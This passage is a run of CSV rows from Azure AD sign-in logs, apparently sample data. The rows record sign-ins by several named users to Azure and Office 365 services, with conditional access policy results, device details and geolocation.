'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['AppEnforcedRestrictions'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'JulianI Exchange native controls', 'result': 'notApplied', 'id': 'e183bd29-a3a3-4f91-a5a3-b83b21a544df'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'reportOnlyNotApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}]",notApplied,09/04/2020 18:03,"{'operatingSystem': 'Windows 10', 'deviceId': '186ef690-f143-49cd-9d77-bcb2bdc8f0ef', 'browser': 'Edge 80.0.361', 'displayName': 'YANIVSH-SU', 'trustType': 'Hybrid Azure AD joined', 'isCompliant': True, 'isManaged': True}",a6587ce8-3be2-4519-a1d8-68efe4e60000,,,"{'countryOrRegion': 'IL', 'geoCoordinates': {'longitude': 34.85319900512695, 'latitude': 32.32146072387695}, 'state': 'Hamerkaz', 'city': 'Netanya'}",none,none,none,none,[],{'errorCode': 0},Yaniv Shasha,4daf13e6-b859-4673-a823-01853ff28370,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,a6587ce8-3be2-4519-a1d8-68efe4e60000,SigninLogs,Sucess,32.32146072,34.85319901
+611,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,07:50.2,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,d424479f-d00f-0000-5683-4399cb9c0d17,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Office 365 SharePoint Online,00000003-0000-0ff1-ce00-000000000000,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notEnabled', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['AppEnforcedRestrictions'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'JulianI Exchange native controls', 'result': 'notApplied', 'id': 'e183bd29-a3a3-4f91-a5a3-b83b21a544df'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'reportOnlyNotApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}]",success,09/04/2020 18:07,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 80.0.361'}",cfab9824-c87d-41e8-8623-1f6daabf1c00,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office 365 SharePoint Online,cfab9824-c87d-41e8-8623-1f6daabf1c00,SigninLogs,Sucess,33.7984581,-84.38828278
+612,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,08:07.8,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,9e3c9072-0960-4254-a07f-01e864e6ec9e,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,SharePoint Online Web Client Extensibility,08e18876-6177-487e-b8b5-cf950c1e598c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notEnabled', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['AppEnforcedRestrictions'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'JulianI Exchange native controls', 'result': 'notApplied', 'id': 'e183bd29-a3a3-4f91-a5a3-b83b21a544df'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'reportOnlyNotApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}]",success,09/04/2020 18:08,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 80.0.361'}",e446f264-3933-463f-bc0b-d422ca122000,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office 365 SharePoint Online,e446f264-3933-463f-bc0b-d422ca122000,SigninLogs,Sucess,33.7984581,-84.38828278
+613,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,03:47.1,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,c1f2e17e-30b6-4474-baa7-f2318e7976fa,Microsoft.aadiam,Microsoft.aadiam,,Yaniv Shasha,4,IL,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notEnabled', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['AppEnforcedRestrictions'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'JulianI Exchange native controls', 'result': 'notApplied', 'id': 'e183bd29-a3a3-4f91-a5a3-b83b21a544df'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'reportOnlyNotApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}]",notApplied,09/04/2020 18:03,"{'operatingSystem': 'Windows 10', 'deviceId': '186ef690-f143-49cd-9d77-bcb2bdc8f0ef', 'browser': 'Edge 80.0.361', 'displayName': 'YANIVSH-SU', 'trustType': 'Hybrid Azure AD joined', 'isCompliant': True, 'isManaged': True}",6ac7d6a5-203d-410a-b4e2-b96d70f00000,,,"{'countryOrRegion': 'IL', 'geoCoordinates': {'longitude': 34.85319900512695, 'latitude': 32.32146072387695}, 'state': 'Hamerkaz', 'city': 'Netanya'}",none,none,none,none,[],{'errorCode': 0},Yaniv Shasha,4daf13e6-b859-4673-a823-01853ff28370,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,6ac7d6a5-203d-410a-b4e2-b96d70f00000,SigninLogs,Sucess,32.32146072,34.85319901
+614,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,13:13.2,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,50140,None,This error occurred due to 'Keep me signed in' interrupt when the user was signing-in.,0,49aa38bd-08fe-402e-a0f0-3ad25a1c4dd9,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Microsoft Cloud App Security,05a65629-4c1b-48c1-a78b-804c4abdd4af,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notEnabled', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['AppEnforcedRestrictions'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'JulianI Exchange native controls', 'result': 'notApplied', 'id': 'e183bd29-a3a3-4f91-a5a3-b83b21a544df'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'reportOnlyNotApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}]",notApplied,09/04/2020 18:13,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",0a70c0cd-a111-442a-87bb-4de8e3a11e00,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],"{'errorCode': 50140, 'failureReason': ""This error occurred due to 'Keep me signed in' interrupt when the user was signing-in.""}",Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,0a70c0cd-a111-442a-87bb-4de8e3a11e00,SigninLogs,Failed,33.7984581,-84.38828278
+615,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,21:28.1,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,57f3883f-5501-4483-9343-a8198c42d5e1,Microsoft.aadiam,Microsoft.aadiam,,On-Premises Directory Synchronization Service Account,4,US,Microsoft Azure Active Directory Connect,cb1056e2-e479-49de-ae31-7812af012ed8,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notEnabled', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['AppEnforcedRestrictions'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'JulianI Exchange native controls', 'result': 'notApplied', 'id': 'e183bd29-a3a3-4f91-a5a3-b83b21a544df'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'reportOnlyNotApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}]",notApplied,09/04/2020 18:21,"{'operatingSystem': 'Windows 8', 'deviceId': '', 'browser': 'Rich Client 5.0.5.0'}",8ccd2b23-7303-4913-b6ad-50874f7b1d00,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.26995086669922, 'latitude': 36.64046859741211}, 'state': 'Virginia', 'city': 'Boydton'}",none,none,none,none,[],{'errorCode': 0},On-Premises Directory Synchronization Service Account,b5084e7d-75cb-41c3-949b-bf61e1f9636b,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,8ccd2b23-7303-4913-b6ad-50874f7b1d00,SigninLogs,Sucess,36.6404686,-78.26995087
+616,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,57:05.2,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,2c52b82e-8f80-4fed-88d5-4ec394a5bb4d,Microsoft.aadiam,Microsoft.aadiam,,Yaniv Shasha,4,IL,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,09/04/2020 13:57,"{'operatingSystem': 'Windows 10', 'deviceId': '186ef690-f143-49cd-9d77-bcb2bdc8f0ef', 'browser': 'Chrome 80.0.3987', 'displayName': 'YANIVSH-SU', 'trustType': 'Hybrid Azure AD joined', 'isCompliant': True, 'isManaged': True}",0e9e6ec2-3909-45d6-890e-098638364800,,,"{'countryOrRegion': 'IL', 'geoCoordinates': {'longitude': 34.85319900512695, 'latitude': 32.32146072387695}, 'state': 'Hamerkaz', 'city': 'Netanya'}",none,none,none,none,[],{'errorCode': 0},Yaniv Shasha,4daf13e6-b859-4673-a823-01853ff28370,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,0e9e6ec2-3909-45d6-890e-098638364800,SigninLogs,Sucess,32.32146072,34.85319901
+617,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,59:27.1,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,3b8be8a8-ef28-453d-b76d-658753bb1e07,Microsoft.aadiam,Microsoft.aadiam,,Admin,4,BE,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 3, 'displayName': 'Semolen - Admin MFA', 'result': 'success', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",success,09/04/2020 13:59,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 80.0.361'}",93d4df14-2ec3-46f2-a774-ff587eb41600,,,"{'countryOrRegion': 'BE', 'geoCoordinates': {'longitude': 5.572050094604492, 'latitude': 50.64065170288086}, 'state': 'Liege', 'city': 'Liege'}",none,none,none,none,[],"{'errorCode': 0, 'additionalDetails': 'MFA requirement satisfied by claim in the token'}",Admin,bdb72692-2275-412b-8af0-ea21c2ebd174,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,93d4df14-2ec3-46f2-a774-ff587eb41600,SigninLogs,Sucess,50.6406517,5.572050095
